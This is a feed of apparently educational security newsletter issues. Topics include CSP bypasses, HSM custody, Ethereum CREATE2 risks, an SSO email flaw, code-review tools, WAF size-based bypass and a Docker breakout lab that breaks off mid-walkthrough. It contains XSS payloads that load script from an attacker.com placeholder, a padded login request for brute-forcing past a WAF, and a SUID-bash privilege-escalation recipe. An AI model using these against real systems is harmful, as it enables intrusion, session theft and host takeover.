The most common one? `&apos;unsafe-inline&apos;` just sitting there in the policy:

```bash
Content-Security-Policy: script-src &apos;self&apos; &apos;unsafe-inline&apos;

```

When you see this, your standard XSS payloads work perfectly:

```html
&lt;script&gt;alert(document.cookie)&lt;/script&gt;
&lt;img src=x onerror=&quot;alert(1)&quot;&gt;
&lt;svg onload=&quot;alert(1)&quot;&gt;

```

Next up is the missing `base-uri`. Check this out:

```bash
Content-Security-Policy: script-src &apos;self&apos;

```

Looks pretty locked down, right? Script source is restricted to the same origin. But there&apos;s no `base-uri` directive. That means you can inject a `&lt;base&gt;` tag:

```html
&lt;base href=&quot;https://attacker.com/&quot;&gt;

```

&lt;details&gt;
&lt;summary&gt;Now when the page loads its legitimate scripts:&lt;/summary&gt;

```html
&lt;script src=&quot;/js/app.js&quot;&gt;&lt;/script&gt;

```
&lt;/details&gt;


The browser goes &quot;okay, base is attacker.com, so this must be `https://attacker.com/js/app.js`&quot; and loads your malicious script instead. You didn&apos;t even need to inject your own script tag. You just redirected theirs.

Then there&apos;s the lazy wildcard approach:

```bash
Content-Security-Policy: script-src &apos;self&apos; https:

```

The `https:` directive allows any HTTPS site. Since 99% of the internet runs on HTTPS now, this is basically worthless:

```html
&lt;script src=&quot;https://attacker.com/xss.js&quot;&gt;&lt;/script&gt;

```

Just works. Same story with `data:` URLs:

```html
&lt;script src=&quot;data:text/javascript,alert(1)&quot;&gt;&lt;/script&gt;

```

&lt;details&gt;
&lt;summary&gt;Subdomain wildcards are another fun one:&lt;/summary&gt;

```bash
Content-Security-Policy: script-src &apos;self&apos; *.example.com

```
&lt;/details&gt;


All you need is ONE vulnerable subdomain. Could be an old forgotten staging server, could be a user upload feature on `uploads.example.com`, doesn&apos;t matter. Find one weakness in any subdomain and the entire CSP falls apart:

```html
&lt;script src=&quot;https://forgotten-staging.example.com/malicious.js&quot;&gt;&lt;/script&gt;

```

Last one: missing `object-src`. When this directive isn&apos;t specified, you can sometimes use `&lt;object&gt;` or `&lt;embed&gt;` tags to bypass everything. It&apos;s browser-dependent and a bit finicky, but it works often enough that it&apos;s worth checking.

## Finding CSP in the Wild

Most of the time you&apos;ll be using Burp Suite or another proxy to intercept traffic. Just look at the response headers in the HTTP history and search for `Content-Security-Policy`. That&apos;s honestly the most practical way when you&apos;re doing actual testing.

&lt;details&gt;
&lt;summary&gt;Quick curl command gets you started:&lt;/summary&gt;

```bash
curl -I https://target.com | grep -i &quot;content-security-policy&quot;

```
&lt;/details&gt;


Or just pop open DevTools (F12), go to the Network tab, reload, click the main request, and look at Response Headers.

Sometimes it&apos;s in a meta tag instead:

```html
&lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;default-src &apos;self&apos;&quot;&gt;

```

One thing to remember: CSP can be in both the header and a meta tag. When that happens, the most restrictive one wins. I&apos;ve seen cases where the header was solid but the meta tag had `&apos;unsafe-inline&apos;`, and guess which one applied? The restrictive one. But I&apos;ve also seen the opposite, where the header was weak and the meta tag tried to lock things down, and the weak header took precedence. Point is, check both.

## Quick Analysis Approach

When you find a CSP, here&apos;s what I do:

First, I look for the obvious wins. Search for `&apos;unsafe-inline&apos;`. If it&apos;s there, I can probably stop looking and just fire off my XSS payload. Search for `&apos;unsafe-eval&apos;` too, because if the app uses any eval-style functions, that&apos;s another easy win.

Check for wildcards: `*`, `https:`, `data:`. These are all way too permissive and usually mean the policy isn&apos;t doing much.

Then I verify what&apos;s missing. Is `base-uri` there? If not, can I inject HTML? If yes to both, base tag injection might work. Is `object-src` there? If not, object/embed tags are worth trying.

Look for subdomain wildcards. If you see `*.example.com`, time to enumerate subdomains and look for vulnerable ones or file upload functionality.

There&apos;s a tool from Google called CSP Evaluator (https://csp-evaluator.withgoogle.com/) that automates a lot of this analysis. Paste in the policy and it&apos;ll tell you what&apos;s weak. Super useful for quick assessments.

## Wrapping Up

So that&apos;s the foundation. What CSP is, how it works, the directives that matter, and the misconfigurations you&apos;ll run into constantly. The reality is that most CSPs have at least one weakness, usually because getting this right is genuinely difficult. It&apos;s not that developers are bad at their jobs. It&apos;s that CSP is complex, and the tradeoffs between security and functionality are real.

Thanks for reading. Hope this helps you spot these issues faster in your next assessment.

Stay sharp, Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Hardware Security Modules: The Fortress Guarding Blockchain&apos;s Crown Jewels</title><link>https://www.kayssel.com/newsletter/issue-19</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-19</guid><description>How exchanges and institutions actually protect billions in crypto assets</description><pubDate>Sun, 12 Oct 2025 09:55:11 GMT</pubDate><content:encoded>Hi everyone,

Something interesting I&apos;ve been studying and seeing in the latest audits I&apos;ve been doing is Hardware Security Modules (HSMs) and how they&apos;re being used in custody solutions. If you&apos;ve ever wondered where exchanges actually store the keys controlling millions in crypto, or what makes institutional custody &quot;enterprise-grade,&quot; this one&apos;s for you.

## What Exactly Is an HSM?

So an HSM is basically a physical device that&apos;s specifically designed to generate, store, and protect cryptographic keys. Unlike software wallets that run on regular computers, an HSM is purpose-built hardware with literally one job, and that&apos;s to keep secrets secret.

I like to think of it as a vault with a built-in cryptographic processor. The critical difference is that private keys never leave the device. All signing operations happen inside the module, and only the results (like signatures or encrypted data) actually get exported.

The device itself is tamper-resistant. If you try to open it, it destroys its contents. If you try to read its memory externally, you&apos;ll just find encrypted data. Even the HSM&apos;s own CPU can&apos;t extract keys in plaintext because they&apos;re locked in secure memory with hardware-enforced access controls.

When you need to sign a blockchain transaction, here&apos;s basically what happens. Your application sends the transaction hash to the HSM. Then the HSM validates the request by checking access policies and authentication. The private key signs the hash inside the HSM where nobody can see it or extract it. Only the signature gets returned to your application. Throughout this entire process, the private key stays protected and never leaves the device.

The golden rule here is pretty simple. Keys go into the HSM during initialization and never come out in plaintext. Ever.

## FIPS: The Security Seal That Matters

Most enterprise HSMs are certified under **FIPS 140-2** or **FIPS 140-3** standards. FIPS (Federal Information Processing Standards) is basically a U.S. government security certification program that validates cryptographic modules. The certification has 4 levels of increasing security, but for custody solutions handling serious value, **Level 3 is the bare minimum**. At this level, the device actively detects and responds to physical intrusion attempts by immediately wiping all keys.

## HSM Custody Architectures

In recent audits, I&apos;ve seen HSMs deployed across different custody models. Let me break down the most common architectures and what makes each one tick.

### Exchange Hot Wallets

So centralized exchanges use HSMs to protect hot wallets that process thousands of withdrawals every day. The typical setup has the HSM storing private keys for high-volume addresses while the withdrawal service authenticates and sends transaction hashes to the HSM for signing. The HSM only signs if the request passes all the policy checks, stuff like amount limits, rate limits, and authorized operators. Once it&apos;s signed, the transaction gets broadcast to the network.

Hot wallets need to be online 24/7 for instant withdrawals, which is why HSMs are perfect here. They give you the best balance between accessibility and security. Keys are always available for signing but totally protected from extraction. Major exchanges have publicly stated that their hot wallet keys never exist outside these FIPS Level 3 certified devices. It&apos;s actually a pretty elegant solution when you think about it, because the alternative would be storing keys in software where a single breach could mean game over.

### Institutional Custody Providers

Institutional custody providers basically build their entire infrastructure around HSMs. Client assets get stored in wallets whose keys live exclusively inside these devices. What makes this architecture really interesting is the multi-party approval workflows that get enforced at the HSM level itself. Each withdrawal requires multiple authenticated operators, and the HSM enforces the policy so that no single person can move funds.

A typical institutional setup might require different approval thresholds based on transaction size. Like, smaller withdrawals might need two operators, while larger amounts require three or more. The HSM can also enforce rate limits, like maximum transactions per hour per wallet, and restrict withdrawals to whitelisted destination addresses only. Geographic distribution is super common here too, with HSMs placed in different data centers for redundancy and disaster recovery. I&apos;ve seen setups where moving a significant amount requires people in different countries to coordinate, which sounds inconvenient until you realize that&apos;s exactly the point.

### Cold Storage with HSM-Protected Keys

Cold storage uses HSMs differently, and honestly, this is where things get really interesting from a security perspective. Master keys get generated and stored in air-gapped HSMs that are kept in physically secure vaults like actual bank vaults or secure data centers. When funds need to move, these HSMs get temporarily brought online in secure facilities where the signing ceremony occurs inside the device. Once that&apos;s done, the devices immediately return to offline storage.

Some organizations take this even further with geographically distributed HSMs for cold storage. Key shards get stored in HSMs across multiple continents, which means you need physical presence at multiple locations to sign transactions. This gives you protection against single-site compromise or natural disasters. It&apos;s essentially a physical manifestation of threshold security. Sure, it makes moving funds way more complex, but when you&apos;re protecting hundreds of millions or billions in assets, that complexity is a feature, not a bug.

### Other Use Cases

Beyond these primary custody models, HSMs pop up in all sorts of other blockchain applications. Stablecoin issuers use them to protect the keys that control mint and burn operations, which makes sure that no unauthorized token creation can happen. Companies tokenizing real-world assets rely on HSMs for administrative contract keys and treasury management operations.

Payment processors and merchant services that handle crypto transactions use HSMs to automate signing for high-volume, low-value transactions while keeping security standards high. Even some DAOs and protocol governance systems have started incorporating HSMs into their multisig setups to add an extra layer of security for protocol-owned value. The technology is flexible enough that once you understand the basics, you start seeing use cases everywhere.

## The Evolution: MPC Custody

The custody landscape is evolving beyond traditional HSMs. **Multi-Party Computation (MPC)** is gaining serious traction as an alternative approach, and honestly, it&apos;s one of the more fascinating developments I&apos;ve been tracking.

### How MPC Works

So instead of storing a complete private key in one place, MPC splits the key into **multiple shards** that get distributed across different parties or servers. The key itself never exists in complete form, not even during signing. Let me explain how this actually works in practice.

When a transaction needs to be signed, each party computes their portion of the signature using their key shard. These partial signatures then get combined mathematically to produce a valid signature, as if a complete key had signed it. But here&apos;s the really clever part, and this blew my mind when I first learned about it. The full key never materializes at any point in the process. It&apos;s like having a secret that nobody fully knows, yet everyone can collectively use.

### MPC vs HSM: The Trade-offs

Traditional HSMs have been the gold standard for decades because they come with proven FIPS certifications that regulators actually recognize and trust. They offer rock-solid physical protection and there&apos;s a mature ecosystem of vendors and support. But they have this fundamental limitation. If someone compromises the HSM, it&apos;s game over. All your keys are sitting in one place. They&apos;re also pretty expensive, typically costing anywhere from $10k to $50k per device plus ongoing maintenance, and they tie you to specific physical locations.

MPC takes a completely different approach. By distributing key shards across multiple parties or locations, there&apos;s no single point of failure anymore. If one shard gets compromised, the attacker basically gets nothing useful. MPC is also way more operationally flexible, which is perfect for distributed teams working remotely across different time zones. Since it can be implemented in software, the infrastructure costs are generally lower, and updating or rotating key shares is more straightforward than physically managing HSM devices.

But MPC isn&apos;t without its challenges. The technology is newer, which means it lacks the decades of battle-testing and regulatory acceptance that HSMs have. There&apos;s no FIPS equivalent for MPC yet, which can be a real blocker when you&apos;re dealing with regulated financial institutions or government contracts. Implementation complexity is also very real. Getting the cryptography right is way harder than just plugging in a certified HSM. And in some jurisdictions, regulators are still trying to figure out how to classify and regulate MPC-based custody solutions.

### The Hybrid Approach

The current trend I&apos;m seeing is what I&apos;d call the best of both worlds approach. Instead of picking one or the other, leading custody providers are combining both technologies into what we call **MPC + HSM hybrid architectures**.

The concept is pretty straightforward but really powerful. Each MPC key shard gets stored inside its own HSM. So you get distributed trust from MPC combined with hardware security from HSMs. Like, you might have a 5-of-9 threshold where each of the 9 shards lives in a different HSM in a different location.

This hybrid model is becoming the gold standard for institutional custody because it basically checks all the boxes. Regulators understand and trust FIPS-certified HSMs. MPC provides the resilience and distribution that modern custody actually needs. And it gives you operational flexibility for geographically distributed teams. When you&apos;re protecting assets worth millions or billions, spending a bit extra to combine both approaches just makes sense.

Thanks for reading. Hope this gives you a clearer picture of how institutional custody actually works under the hood. The next time you see &quot;enterprise-grade custody&quot; in some marketing material, you&apos;ll know what questions to ask.

See you in the next one!

Stay sharp,  
Ruben</content:encoded><category>Newsletter</category><category>active-directory</category><author>Ruben Santos</author></item><item><title>Predictable Contracts: Understanding CREATE and CREATE2 in Ethereum</title><link>https://www.kayssel.com/newsletter/issue-18</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-18</guid><description>How deterministic addresses unlock powerful features and subtle attack vectors auditors should never overlook.</description><pubDate>Sun, 05 Oct 2025 15:10:07 GMT</pubDate><content:encoded>Hi everyone,

In this edition I want to dive into something that sits at the core of Ethereum: how contract addresses are generated. If you’ve ever wondered how attackers can predict where a smart contract will live _before_ it’s even deployed, this one’s for you.

# The Classic Way: `CREATE`

Traditionally, contracts are deployed with the `CREATE` opcode. Solidity handles this every time you write:

```solidity
MyContract c = new MyContract();

```

Under the hood, the EVM computes the new address as:

```solidity
keccak256(rlp([sender, nonce]))[12:]

```

Where:

-   **sender** = the deployer’s address
-   **nonce** = the deployer’s transaction count

This means that if you know an account’s address and nonce, you can deterministically calculate where its next contract will be deployed.

# The New Paradigm: `CREATE2`

Introduced with [EIP-1014](https://eips.ethereum.org/EIPS/eip-1014) the `CREATE2` opcode gives developers more control. Solidity exposes it with:

```solidity
new MyContract{salt: _salt}();

```

&lt;details&gt;
&lt;summary&gt;Where:&lt;/summary&gt;

```solidity
keccak256(0xff ++ sender ++ salt ++ keccak256(init_code))[12:]

```
&lt;/details&gt;


-   **salt** = a user-provided value
-   **init\_code** = the contract’s creation bytecode

This allows developers to precompute an address before the contract exists, a key feature for counterfactual contracts, meta-transactions, and smart wallets.

# Risks and Attack Scenarios

While powerful, both `CREATE` and `CREATE2` introduce interesting risks. Some ideas that usually come to mind when reviewing contracts that rely on these patterns are:

-   🔒 **Front-running &amp; squatting:** attackers can preemptively deploy contracts at addresses others plan to use.
-   👻 **Shadow contracts:** malicious contracts can be deployed at expected addresses if salts aren’t carefully controlled.
-   ♻️ **Code replacement:** with `CREATE2`, a contract can be destroyed and redeployed at the same address dangerous if external systems assume code immutability.
-   💸 **Value pre-funding abuse:** attackers can send ETH to precomputed addresses (even if no contract is deployed there) to change assumptions, grief users, or create unexpected states. This is low-cost and often overlooked protocols that implicitly assume zero balance or an unused address can be tripped by simple pre-funding.

# Mitigation Tips

On the other hand, some good practices that could be applied here are:

-   🧂 **Use unique, unpredictable salts** when working with `CREATE2` to avoid predictable deployments or collisions.
-   🔒 **Guard against re-initialization** in contracts that might be redeployed (e.g., use initialization flags tied to constructor arguments or immutable codehash checks).
-   💰 **Don’t rely on zero balance assumptions. E**xplicitly check the code hash (`extcodehash`) and verify that `address.balance` is within expected bounds.
-   ⏳ **Reserve counterfactual addresses safely:** consider time-locked reservations or an on-chain registration step before allowing sensitive actions.
-   🧪 **Test pre-funded scenarios**: include cases where the target address already holds ETH or ERC20 tokens.
-   📝 **Verify the bytecode hash** if immutability is assumed `REATE2` allows redeployment at the same address.

Thanks for reading hope this gives you a few new angles to test in your own reviews.  
See you in the next one!

Stay sharp,  
Ruben</content:encoded><category>Newsletter</category><category>web3-security</category><author>Ruben Santos</author></item><item><title>The Day an Email Broke Single Sign-On</title><link>https://www.kayssel.com/newsletter/issue-17</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-17</guid><description>Exploiting weak email validation in OAuth2 SSO</description><pubDate>Sun, 28 Sep 2025 17:26:23 GMT</pubDate><content:encoded>Hi everyone,

In this edition I want to share something a bit different, focused on authentication in web applications. It’s a neat trick that I think is worth testing in your own engagements. Hope you enjoy it!

# The story

When dealing with authentication and single sign-on (SSO) systems, email addresses are often used as unique identifiers. This makes sense because they are easy to validate and naturally unique for most users. However, using emails as identifiers without carefully designing how they are handled can introduce unexpected risks.

One common issue arises when applications allow changes to critical identifiers like email addresses without proper validation. If login logic is tied to these identifiers, attackers can abuse the process to disrupt normal access or even escalate their privileges.

A couple of months ago I found a real example of this during a security review of an OAuth2 single sign-on system. At first glance everything seemed fine. Companies, or tenants, could register wallets for their users, and each tenant could add multiple accounts. Emails were treated as unique across the platform. If one tenant had already registered an email, no other tenant could use the same one. The system would reject the attempt and show an error saying the user already existed.

The protection looked solid, but there was a flaw. The restriction only applied at registration time. When editing an account, the platform allowed the email to be changed to one that was already in use. No validation checks were performed.

Because the system was based on SSO, the login flow became much more dangerous. The platform always prioritized the account that had been created first when deciding where to log a user in.

This design opened the door to two serious attack scenarios.

1.  **Denial of Service (DoS)**  
    An attacker could create an account before the victim and later change its email to match the victim’s. From that moment on, the login flow would always resolve to the attacker’s tenant. The victim would be locked out of their real account and unable to access their company environment.
2.  **Privilege Escalation**  
    Within a single tenant, the same logic allowed privilege escalation. If an attacker registered a normal account before an administrator was created, they could later update their email to the administrator’s. Since the older account took precedence, every login would grant the attacker administrator rights instead of regular user privileges.

A small oversight in email validation combined with the “first account wins” rule in the SSO logic turned into a powerful vulnerability.

A small story, but I think it’s a useful tip that often goes untested and can lead to serious trouble. See you in the next one!

Stay sharp,  
Ruben</content:encoded><category>Newsletter</category><category>web3-security</category><author>Ruben Santos</author></item><item><title>Taming the Beast: Practical Code Review with Security Tools</title><link>https://www.kayssel.com/newsletter/issue-16</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-16</guid><description>From endless lines of code to streamlined reviews with TruffleHog, CodeQL, and Trivy.</description><pubDate>Sun, 21 Sep 2025 08:06:22 GMT</pubDate><content:encoded>Hi everyone!

Over the past few weeks, I&apos;ve been working on a large and complex code review project. Along the way, I came across a few tools and tips that proved really valuable during a pentest. In this edition, I&apos;d like to share them with you. Hopefully, you&apos;ll find them just as useful in your own work 😄

# Know the architecture

The most important step is to understand what you&apos;re up against. I usually start by asking for any architecture or design diagrams the team can provide. The clearer the picture, the better. From there, I can begin building a threat model, asking myself questions such as:

-   Are they encrypting sensitive data in the database?
-   Are secrets hardcoded in the codebase?
-   What possible edge cases could exist?

Nowadays, most developers rely on CI/CD tools to catch common security issues in code. That means your best chance to add value is by looking for business logic vulnerabilities and that&apos;s why understanding the full architecture is so important.

# Codeql

Once you have a basic understanding of the architecture and threat model, it&apos;s a good idea to run tools that check for common issues. One of my favorites is CodeQL.

CodeQL works by running queries against a repository you define, looking for vulnerabilities in a specific programming language. You can do this with the CodeQL CLI in two main steps:

1.  Create a database from the repository
2.  Run queries against the database

Here&apos;s a minimal example:

```bash
# Step 1: Create the CodeQL database
codeql database create my-database \
  --language=javascript \
  --source-root=/path/to/repo

# Step 2: Analyze the database with the experimental query pack
codeql database analyze my-database \
  codeql/javascript-experimental-queries \
  --format=sarifv2 \
  --output=results.sarif
```

The query packs such as `codeql/javascript-experimental-queries` come from the official [CodeQL GitHub repository](https://github.com/github/codeql/blob/main/javascript/ql/src/codeql-suites/javascript-security-experimental.qls). They often include checks that are not part of the default query suite but can highlight interesting edge cases or experimental rules.

Once you have your results in .sarif format, you can open them locally in Visual Studio Code using [Sarif Viewer](https://marketplace.visualstudio.com/items?itemName=MS-SarifVSCode.sarif-viewer) extension, which provides a clear interface to explore findings directly from your editor.

The cool thing about CodeQL is that it lets you trace issues back through the code flow, so you can understand why they were introduced.

⚠️ **Note**: CodeQL’s free use is limited to open source projects. For private repositories, you’ll need a GitHub Advanced Security license.

# Semgrep

This is the second tool that I use the most. In my opinion, it&apos;s not as strong as CodeQL, but it&apos;s still very effective. Semgrep relies on pattern matching (regex-like rules) to identify issues in code, and it&apos;s much more straightforward to set up and run.

Here&apos;s a simple example of how to use it:

```bash
# Install Semgrep (if not already installed)
pip install semgrep

# Run Semgrep against a Go project using the Golang ruleset
semgrep --config p/golang /path/to/repo

```

You can explore the available rules directly on their website: [https://semgrep.dev/p/golang](https://semgrep.dev/p/golang)

# TruffleHog

Now that we have a basic understanding of the possible issues in the code, the next step is to try to detect secrets that may be hardcoded in the target&apos;s GitHub repo. For this, the best tool in my opinion is TruffleHog. It&apos;s quite straightforward to run. Since I&apos;m usually testing private repos, the only command I run is the following:

```bash
$ trufflehog git file://test_keys --results=verified,unknown
```

Another interesting thing you can do, if you have the binary of the code you are auditing, is run the `strings` command-line tool to search for secrets as well.

# Trivy

The last tool you may want to use, if the deployment of your target is in scope, is **Trivy**. Trivy allows you to find misconfigurations in things like Dockerfiles or Kubernetes, so it&apos;s quite useful. You can run it directly using:

```bash
trivy fs --scanners vuln,secret,misconfig myproject/
```

# Wrapping up

That&apos;s all for now! I hope you picked up something useful in this chapter. Code review isn&apos;t exactly my idea of a fun Friday night, most projects come with thousands of lines of code that look like they were written by caffeinated squirrels, but with the right tools, the whole process becomes a lot less painful (and maybe even survivable).

See you in the next one.  
Stay sharp,  
Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Bypassing Cloud Firewalls: Size Does Matter</title><link>https://www.kayssel.com/newsletter/issue-15</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-15</guid><description>Bypassing Akamai, CloudFront &amp; Cloudflare with oversized requests.</description><pubDate>Sun, 14 Sep 2025 09:33:42 GMT</pubDate><content:encoded>Hey everyone 👋

This week I want to switch gears from smart contracts and dive back into something more web-app flavored: firewall bypass techniques in cloud environments. If you’ve ever tested apps behind Akamai, AWS CloudFront, or Cloudflare, you’ve probably noticed how resilient they can be against classic attacks. Rate-limiting, WAF signatures, bot protections… the whole package.

But here’s the catch: most of these protections are still “size-sensitive.” In other words, how you shape your request can determine whether it’s blocked or allowed through.

# Why Size Matters

Many WAFs [set thresholds for request length or body size](https://blog.1nf1n1ty.team/hacktricks/pentesting-web/proxy-waf-protections-bypass#request-size-limits). Too short and it looks suspicious; too long and it might be truncated or ignored. Clever attackers exploit this to sneak payloads past filtering layers.

What makes this interesting is that bypasses often don’t affect the whole app, but only specific endpoints. A typical example: the `/login` endpoint. It usually has stricter protections (blocking brute-force attempts or filtering payloads). With size-based evasion, you can sometimes slip through those controls and suddenly brute-force passwords on a page that looked bulletproof.

On top of that, some WAFs add a second defense mechanism: rate limiting. If you send too many requests too quickly, you’ll get blocked, even if your payloads are well-shaped. The trick? Tools like Burp Suite or Nuclei let you tune the request rate. Simply slowing down your attack to stay under the radar can be enough to bypass these protections.

## Example Request

```bash
POST /login HTTP/1.1
Host: target-app.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 8450   ← 👈 Notice: body size &gt;8KB, may bypass inspection

username=admin&amp;password=pass123
&amp;padding=AAA[...]AAA   ← 👈 Artificial padding to increase request size

```

In this example, the Content-Length is deliberately set above 8KB and the request body is inflated with dummy data (`AAA[...]AAA`). Some WAFs won’t fully inspect payloads past a certain size, which allows attackers to sneak through.

# Practical Tips

-   **Identify the WAF first** → Look at response headers (e.g., `server: AkamaiGHost`, `x-cache`, `cf-ray`, etc.) or use `dig` to check DNS mappings and confirm what service sits in front of the app.
-   **Vary request sizes systematically** → 1KB, 10KB, 100KB, 1MB. Watch what breaks or slips through.
-   **Play with chunked transfer encoding** → Splitting payloads into pieces may bypass reassembly limits.
-   **Test edge cases** → Minimum valid request, maximum allowed request, and right around known inspection caps.
-   **Adjust your rate** → If the WAF has per-second request controls, just throttle your tool (Burp, Nuclei, ffuf) to fly under the radar.

# Wrapping Up

Firewalls in the cloud are strong, but they’re not perfect. Their need to balance security vs. performance often introduces blind spots and size-based bypasses are a classic example. For auditors, it’s a reminder: don’t just test functionality broadly, target those “sensitive” endpoints like login, signup, or password reset where controls are strictest. That’s usually where size tricks and careful throttling have the biggest payoff.

Stay sharp 🕶️  
Ruben</content:encoded><category>Newsletter</category><category>web-security</category><category>cloud-security</category><author>Ruben Santos</author></item><item><title>ERC-20s in the Wild: Why Vanilla Assumptions Breaks</title><link>https://www.kayssel.com/newsletter/issue-14</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-14</guid><description>When ERC-20s Don’t Play Nice</description><pubDate>Sat, 06 Sep 2025 09:00:07 GMT</pubDate><content:encoded>Hey everyone 👋

I’m back from a short vacation and diving straight into smart contract audits again.

This week there’s also a brand-new chapter in the Docker security series 🐳. If you’re into container security, I’m covering practical Docker breakout techniques along with some progress updates on Valeris, the tool I’m building in Rust to explore these scenarios. If that sounds interesting, make sure to check it out before diving into today’s smart contract topic!

[When Containers Lie: Escaping Root and Breaking Docker Isolation](https://www.kayssel.com/post/docker-security-2/)

One thing I’ve noticed over and over is how often protocols assume ERC-20s behave like “vanilla” tokens. You know, simple balanceOf, transfer, transferFrom … nothing fancy.  
But first, let’s quickly recap what an ERC-20 is. In short, it’s a token standard on Ethereum that defines a common interface for fungible assets. This means any token that follows the ERC-20 rules can be used interchangeably by wallets, exchanges, and protocols. At its core, an ERC-20 keeps track of balances and allows transfers between accounts. It also defines functions like approve and transferFrom so contracts can move tokens on behalf of users. The whole point is interoperability: if every token speaks the same “language”, developers can build without worrying about the specific implementation of each asset.

The catch is that not every ERC-20 sticks to this “vanilla” model. Some introduce quirks or edge cases that can completely break integrations if you don’t account for them.

Let’s go through some of the most common troublemakers.

## Fee-on-Transfer Tokens

Some tokens apply a fee on every transfer. You might try to send 100 tokens, but the recipient only ends up with 95. This breaks assumptions in many protocols that expect one-to-one transfers. Accounting, reward distribution, and balance checks often fail when the received amount is smaller than expected.

## Reverting on Zero Transfers

In vanilla tokens, transferring zero is harmless and often used by protocols as a quick sanity check. However, some implementations revert if you try to transfer zero. Suddenly, batch transfers or loops that assume this behavior will start failing.

## Rebasing or Elastic Supply Tokens

Rebasing tokens change balances automatically, either increasing or decreasing them to maintain certain supply dynamics. This can completely throw off systems that rely on static accounting. Governance systems or lending protocols that depend on exact balance snapshots can break because user balances shift outside of their control.

## Burn-on-Transfer or Deflationary Tokens

Some tokens burn part of the amount being transferred. Over time, this chips away at supply and confuses contracts that assume transfers are lossless. Reward systems, accounting models, and treasuries may miscalculate values as a result.

## Tokens That Don’t Return a Boolean

The ERC-20 spec says transfer should return a boolean, but early tokens like USDT don’t follow this rule. If your contract uses the raw IERC20 interface and expects a return value, things can fail silently. Libraries like OpenZeppelin’s SafeERC20 patch this issue, but it’s always important to verify the behavior of the specific token.

## Wrapping Up

When building or auditing protocols, don’t just assume you’re dealing with a vanilla ERC-20. The reality is that fees, burns, rebases, frozen accounts, or missing return values are all out there in production tokens. If your system isn’t prepared, it will eventually fail when faced with these variations.

That’s why one of the safest design choices is to avoid supporting arbitrary tokens altogether. Instead of accepting any ERC-20, build a curated list of approved assets. Expanding this list gradually, after testing each token type, reduces the attack surface and avoids hidden edge cases that can cost real money.

That’s it for this week, stay sharp out there 🕶️  
Ruben

## References

I usually don’t share references in the newsletter because it’s more of a “personal experience” thing, but I thought I’d share two articles that are quite interesting if you’d like to dive deeper into these topics.

-   Fee on transfer &amp; Rebase Tokens. [https://medium.com/@0xnolo/fee-on-transfer-rebase-tokens-an-erc-20-security-bug-you-need-to-know-f4e5badea1ee](https://medium.com/@0xnolo/fee-on-transfer-rebase-tokens-an-erc-20-security-bug-you-need-to-know-f4e5badea1ee)
-   ERC-20 Token Security: What You Need to Consider. [https://medium.com/thesis-defense/erc20-token-security-what-you-need-to-consider-46ab8231a050](https://medium.com/thesis-defense/erc20-token-security-what-you-need-to-consider-46ab8231a050)</content:encoded><category>Newsletter</category><category>code-review</category><author>Ruben Santos</author></item><item><title>When Containers Lie: Escaping Root and Breaking Docker Isolation</title><link>https://www.kayssel.com/post/docker-security-2</link><guid isPermaLink="true">https://www.kayssel.com/post/docker-security-2</guid><description>We explore how root containers and host mounts enable privilege escalation, from SUID binaries in shared volumes to abusing /proc/&lt;PID&gt;/root. Then we show how Valeris detects these risky setups with YAML-based rules before they lead to full host compromise.</description><pubDate>Sat, 06 Sep 2025 08:59:24 GMT</pubDate><content:encoded># TL;DR

-   Spin up intentionally vulnerable Docker containers to see how root users and host mounts can lead to privilege escalation.
-   Walk through two real attack scenarios: abusing a shared host directory and leveraging `/proc/&lt;PID&gt;/root` with matching UIDs.
-   Learn why running containers as root is far more dangerous than it looks.
-   See how Valeris now detects these misconfigurations with YAML-based templates instead of Rust code, making it easier to extend without recompiling.
-   Check out the new update mechanism and detectors, including the `root_user` rule that flags containers running as root.

# From Theory to Practice

Last time we explored how containers work in theory. Namespaces, cgroups and OverlayFS are kernel tricks that make processes feel isolated. But theory rarely survives contact with the real environment.

In this chapter we are going to look at privilege escalation scenarios that often show up during engagements. Imagine you have landed on a box as a low-privileged user. You start your recon and there it is, Docker is installed. Even better, your user is in the `docker` group or the socket is world accessible.

At this point the playbook writes itself. You spin up a container. By default it runs as root, which means you now control a process the kernel considers root. Combine that with a sloppy host mount or a misconfigured container already running as root and suddenly you have a straight path to the host.

These are not rare edge cases. In real-world assessments you will find

-   Dev boxes where engineers launch containers as root because “it is faster”
-   Shared environments with host directories mounted to containers for debugging
-   Systems where being able to run Docker as a normal user is basically equivalent to being root on the host

In this chapter we will recreate those misconfigurations on purpose. We will walk through two classic privilege escalation paths, one with a host mount and another with `/proc/&lt;PID&gt;/root` and matching UIDs, and show how they lead to full compromise. Then we will run Valeris against them to see how these risks can be detected automatically using its new YAML based detectors.

# Privilege Escalation - First Pattern

This scenario only becomes possible when two conditions are met:

1.  The attacker has root inside the container.
2.  There is a mounted host directory shared with that container.

Those two ingredients are enough to turn a simple shared folder into a privilege escalation path.

## Preparing the host environment

&lt;details&gt;
&lt;summary&gt;On the host we create a directory that will be mounted into the container:&lt;/summary&gt;

```bash
mkdir /tmp/hostshare
touch /tmp/hostshare/test.txt
ls -l /tmp/hostshare

```
&lt;/details&gt;


![](/content/images/2025/09/image.png)

Creating the shared directory

## Running the container as root with a mounted volume

We then launch a new Ubuntu container. Since Docker defaults to running as root, and we mount our host directory into `/mnt`, we have both conditions satisfied:

```bash
docker run -it --rm \
  --name vuln-root \
  -v /tmp/hostshare:/mnt \
  ubuntu bash

```

![](/content/images/2025/09/image-1.png)

Running container as root

Inside the container, as root, we can freely access the shared `/mnt` directory.

## Planting a SUID binary from the container

With root privileges inside the container, we copy the `bash` binary into the shared folder, then change its ownership and set the SUID bit:

```bash
cp /bin/bash ./bash      # host: copy the binary
chown root:root bash     # container: set owner to root
chmod 4777 bash          # container: set SUID

```

![](/content/images/2025/09/image-2.png)

Copy bash into the shared folder

![](/content/images/2025/09/image-3.png)

Changing ownership of the SUID file

Now the binary has permissions `-rwsrwxrwx`. This means that whenever it is executed, it runs with the privileges of its owner (root).

## Escalating on the host

Back on the host, our unprivileged user `rsgbengi` goes into the shared directory and runs the new `bash` binary with the `-p` flag:

```bash
./bash -p

```
